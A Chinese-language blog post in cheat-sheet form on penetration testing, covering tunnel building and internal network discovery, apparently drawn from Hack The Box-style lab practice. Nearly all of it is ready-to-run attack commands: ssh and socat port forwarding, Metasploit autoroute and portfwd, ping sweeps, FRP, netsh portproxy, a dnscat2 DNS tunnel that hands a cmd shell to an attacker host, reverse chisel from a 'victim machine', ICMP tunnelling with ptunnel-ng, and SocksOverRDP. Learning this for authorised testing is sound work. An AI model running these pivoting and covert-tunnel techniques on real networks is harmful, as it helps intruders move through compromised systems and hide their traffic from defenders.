渗透测试--隧道搭建&内网探测

作者的掏心话

    该系列名为  渗透测试-XXXX    

    该系列都是比较基础的内容,如各位没找到自己想要的内容,小编给各位赔不是了。
    该系列是以俺日常学习笔记为数据基础,所整理出来的使用手册。该系列希望能够做到成为渗透测试时的帮助手册,提醒渗透的思路、渗透工具的具体使用等内容,以免各位在互联网再不断翻找。由于互联网的内容良莠不齐,俺可保证收集到的内容均经过验证,所以请放心食用。

ssh 搭建socks5代理

ssh -D 1080  -f  user@10.129.x.x -N

ssh 正向端口转发

ssh -L 4444:localhost:3306 user@10.129.x.x

设置多个端口转发 

ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64

 ssh反向端口转发

ssh -R <中间者IP>:8080:0.0.0.0:8000 ubuntu@<中间这IP> -vN

proxychains代理攻击机工具

proxychains nmap -sT -sV -sC -Pn 10.10.1.17

代理主机cmd探测其他网段

for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"

 代理主机powershell探测其他网段

1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.15.5.$($_) -quiet)"}

 msf搭建代理

msf6 > use auxiliary/server/socks_proxy

 查看msf代理情况

msf6 auxiliary(server/socks_proxy) > jobs

msf 进行网段存活扫描 

post/multi/gather/ping_sweep

 msf创建代理路由

msf6 > use post/multi/manage/autoroute

msf6 post(multi/manage/autoroute) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.5.0
SUBNET => 172.16.5.0
msf6 post(multi/manage/autoroute) > run
meterpreter > run autoroute -s 172.16.5.0/23

msf展示路由表

meterpreter > run autoroute -p

 msf端口转发选项表

meterpreter > help portfwd

Usage: portfwd [-h] [add | delete | list | flush] [args]


OPTIONS:

    -h        Help banner.
    -i <opt>  Index of the port forward entry to interact with (see the "list" command).
    -l <opt>  Forward: local port to listen on. Reverse: local port to connect to.
    -L <opt>  Forward: local host to listen on (optional). Reverse: local host to connect to.
    -p <opt>  Forward: remote port to connect to. Reverse: remote port to listen on.
    -r <opt>  Forward: remote host to connect to.
    -R        Indicates a reverse port forward.

 msf创建正向端口转发

        创建本地3300端口 --> 远程主机 172.16.5.19的3389端口的道路

meterpreter > portfwd add -l 3300 -p 3389 -r 172.16.5.19

 msf创建反向端口转发

        创建shell主机的1234端口 --> 10.10.14.18的8081端口

meterpreter > portfwd add -R -l 8081 -p 1234 -L 10.10.14.18

 socat 端口转发

        socat将本地的8080端口流量 -->发送给10.10.14.18:80

socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80

        socat将8080端口流量 --> 发给172.16.5.19

socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443

plink 工具让我们在Windows使用ssh

plink -ssh -D 9050 ubuntu@10.129.15.50
sshuttle -r username@remote_host --ssh-cmd 'ssh -i /path/to/private/key' 0.0.0.0/0

 sshuttle工具创建枢纽

        sshuttle可以说是最方便的工具了,但是我们有必要了解他的原理,因为如果使用不当他可能会对我们的系统造成伤害。sshuttle是结合ssh和iptables来完成的透明代理工具,iptables控制者网络的转发情况,而sshuttle会对iptables进行调整,所以使用的时候请确保sshuttle工具不会干死咱们得iptables。

        通过中继机器10.129.202.64创建动态端口转发,转发送往172.16.5.0/23的流量。

 sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v 

sshuttle工具通过id_rsa创建枢纽

sshuttle -r username@remote_host --ssh-cmd 'ssh -i /path/to/private/key' 0.0.0.0/0

FRP开启穿透代理

开启frpc

./frpc -c frpc.ini

开启frps

./frps -c frps.ini

frpc.ini

[common]
server_addr = 10.10.16.233
server_port = 7000

[socks5]
type = tcp
local_ip = 127.0.0.1            # 本地 SOCKS5 服务 IP
local_port = 1080               # 本地监听的 SOCKS5 端口
remote_port = 7080              # 暴露在服务器端的端口
plugin = socks5

frps.ini

[common]
bind_port = 7000
dashboard_port = 7500

netsh.exe在Windows主机开启隧道

C:\Windows\system32> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25
C:\Windows\system32> netsh.exe interface portproxy show v4tov4

Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.129.42.198   8080        172.16.5.25     3389

dnscat2搭建dns隧道服务器

sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache

 linux dnscat2客户端开启dns隧道

./dnscat --secret=0ec04a91cd1e963f8c03ca499d589d21 inlanefreight.local

powershell dnscat2客户端开启dns隧道

PS C:\htb> Import-Module .\dnscat2.ps1
PS C:\htb> Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd

Chisel搭建动态端口转发socks5服务器

        在受害机器开启1234端口作为socks5服务

./chisel server -v -p 1234 --socks5

         在攻击机链接1234端口获取本地代理为1080

./chisel client -v 10.129.202.64:1234 socks

2022/05/05 14:21:18 client: Connecting to ws://10.129.202.64:1234
2022/05/05 14:21:18 client: tun: proxy#127.0.0.1:1080=>socks: Listening
2022/05/05 14:21:18 client: tun: Bound proxies
2022/05/05 14:21:19 client: Handshaking...
2022/05/05 14:21:19 client: Sending config
2022/05/05 14:21:19 client: Connected (Latency 120.170822ms)
2022/05/05 14:21:19 client: tun: SSH connected

chisel搭建动态端口转发socks5服务器(反向)

        攻击机监听1234端口,等待chiselclient链接穿件动态端口转发

sudo ./chisel server --reverse -v -p 1234 --socks5

        受害机链接攻击机的1234端口,并使用反向代理开启功能

./chisel client -v 10.10.14.17:1234 R:socks

ptunnel-ng搭建端口转发服务器

        受害机开启端口转发服务,将10.129.202.64的22端口准备开启转发

sudo ./ptunnel-ng -r10.129.202.64 -R22

        攻击机链接ptunnel-ng服务器,并将转发流量端口绑定于攻击机2222端口

sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22

ptunnel-ng隐藏流量为ICMP

        将端口转发流量走绑定与ping隧道的2222端口

ssh -D 9050 -p2222 -lubuntu 127.0.0.1

SocksOverRDP搭建Windows动态端口转发代理

C:\Users\htb-student\Desktop\SocksOverRDP-x64> regsvr32.exe SocksOverRDP-Plugin.dll

接着使用mstsc.exe访问远程主机,这里相当于在本机开启了服务器

 

接着将SocksOverRDP-server发送到远程主机,然后运行它

那么本机上面的1080端口就开启成功了


C:\Users\htb-student\Desktop\SocksOverRDP-x64> netstat -antb | findstr 1080
  TCP    127.0.0.1:1080         0.0.0.0:0              LISTENING

Windows挂代理

使用Proxifier就可以了,这里就不多讲这个了,我相信各位肯定会用。 

提升RDP远程性能

        如果用起来不舒服,那就使用

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值